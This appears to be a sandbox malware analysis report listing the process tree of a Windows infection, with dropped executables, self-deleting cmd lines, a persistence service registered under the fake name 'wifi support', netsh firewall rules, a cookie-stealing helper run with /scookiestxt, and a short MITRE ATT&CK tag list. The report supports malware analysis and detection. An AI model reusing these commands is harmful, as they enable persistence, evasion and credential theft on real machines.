C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin2.exe"C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin2.exe"3⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin1.exe"C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin1.exe"3⤵PID:4044
-
-
C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe"C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe"3⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe4⤵PID:6352
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:8032
-
-
-
-
C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\5.exe"C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\5.exe"3⤵PID:6124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 8524⤵
- Program crash
PID:5944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 8564⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 9804⤵
- Program crash
PID:5792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 9844⤵
- Program crash
PID:6020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 11044⤵
- Program crash
PID:7644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 11844⤵
- Program crash
PID:6768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 12644⤵
- Program crash
PID:4504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 13524⤵
- Program crash
PID:5172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D2F8.exeC:\Users\Admin\AppData\Local\Temp\D2F8.exe1⤵PID:5492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw2⤵PID:7716
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx2⤵PID:4980
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:6172
-
-
-
C:\Users\Admin\AppData\Local\Temp\5D0.exeC:\Users\Admin\AppData\Local\Temp\5D0.exe1⤵PID:5376
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5D0.exe"2⤵PID:3772
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:6460
-
-
-
C:\Users\Admin\AppData\Local\Temp\1C76.exeC:\Users\Admin\AppData\Local\Temp\1C76.exe1⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\3733.exeC:\Users\Admin\AppData\Local\Temp\3733.exe1⤵PID:5336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\izjapjig\2⤵PID:156
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\llmxstrz.exe" C:\Windows\SysWOW64\izjapjig\2⤵PID:5840
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create izjapjig binPath= "C:\Windows\SysWOW64\izjapjig\llmxstrz.exe /d\"C:\Users\Admin\AppData\Local\Temp\3733.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4888
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description izjapjig "wifi internet conection"2⤵PID:7704
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start izjapjig2⤵PID:8156
-
-
C:\Users\Admin\cexipxlb.exe"C:\Users\Admin\cexipxlb.exe" /d"C:\Users\Admin\AppData\Local\Temp\3733.exe"2⤵PID:7352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hyubsrvz.exe" C:\Windows\SysWOW64\izjapjig\3⤵PID:8168
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config izjapjig binPath= "C:\Windows\SysWOW64\izjapjig\hyubsrvz.exe /d\"C:\Users\Admin\cexipxlb.exe\""3⤵PID:6416
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start izjapjig3⤵PID:7512
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:8092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1026.bat" "3⤵PID:684
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:7672
-
-
C:\Users\Admin\AppData\Local\Temp\5AD9.exeC:\Users\Admin\AppData\Local\Temp\5AD9.exe1⤵PID:7676
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6824
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\74DA.exeC:\Users\Admin\AppData\Local\Temp\74DA.exe1⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\74DA.exeC:\Users\Admin\AppData\Local\Temp\74DA.exe2⤵PID:5480
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:8176
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\944A.exeC:\Users\Admin\AppData\Local\Temp\944A.exe1⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:2036
-
-
C:\Users\Admin\AppData\Local\Temp\ACC5.exeC:\Users\Admin\AppData\Local\Temp\ACC5.exe1⤵PID:7268
-
C:\Users\Admin\AppData\Local\Temp\D136.exeC:\Users\Admin\AppData\Local\Temp\D136.exe1⤵PID:2112
-
C:\Users\Admin\AppData\Local\Temp\D136.exe"C:\Users\Admin\AppData\Local\Temp\D136.exe"2⤵PID:8040
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7792
-
C:\Users\Admin\AppData\Local\Temp\E125.exeC:\Users\Admin\AppData\Local\Temp\E125.exe1⤵PID:7204
-
C:\Users\Admin\AppData\Local\Temp\is-J6CBV.tmp\E125.tmp"C:\Users\Admin\AppData\Local\Temp\is-J6CBV.tmp\E125.tmp" /SL5="$B02AC,300262,216576,C:\Users\Admin\AppData\Local\Temp\E125.exe"2⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\is-E3NB4.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-E3NB4.tmp\ST.exe" /S /UID=lab2123⤵PID:5520
-
C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe"C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe" /VERYSILENT4⤵PID:644
-
C:\Users\Admin\AppData\Local\Temp\is-LH8P7.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-LH8P7.tmp\prolab.tmp" /SL5="$901F4,575243,216576,C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe" /VERYSILENT5⤵PID:7504
-
-
-
C:\Users\Admin\AppData\Local\Temp\6a-bcf65-201-9e781-19afa8e4af5e6\Bazhebiqufe.exe"C:\Users\Admin\AppData\Local\Temp\6a-bcf65-201-9e781-19afa8e4af5e6\Bazhebiqufe.exe"4⤵PID:2084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exe & exit5⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exeC:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exe6⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6360
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3480
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exe & exit5⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exeC:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exe6⤵PID:7472
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"7⤵PID:7164
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exe & exit5⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exeC:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exe6⤵PID:7524
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\F858.exeC:\Users\Admin\AppData\Local\Temp\F858.exe1⤵PID:5436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6984
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\3DE8.tmp.exeC:\Users\Admin\AppData\Local\Temp\3DE8.tmp.exe1⤵PID:4124
-
C:\Users\Admin\AppData\Local\Temp\4FBC.tmp.exeC:\Users\Admin\AppData\Local\Temp\4FBC.tmp.exe1⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\5A9A.tmp.exeC:\Users\Admin\AppData\Local\Temp\5A9A.tmp.exe1⤵PID:5588
-
C:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba\8F18.exeC:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba\8F18.exe --Task1⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\78D1.tmp.exeC:\Users\Admin\AppData\Local\Temp\78D1.tmp.exe1⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\7EFD.tmp.exeC:\Users\Admin\AppData\Local\Temp\7EFD.tmp.exe1⤵PID:2280
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4076
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6340
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5892
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7632
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7988
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7824
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8180
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5400
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5620
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\B07D.exeC:\Users\Admin\AppData\Local\Temp\B07D.exe1⤵PID:6232
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Install Root Certificate
1Modify Registry
1Scripting
1Web Service
1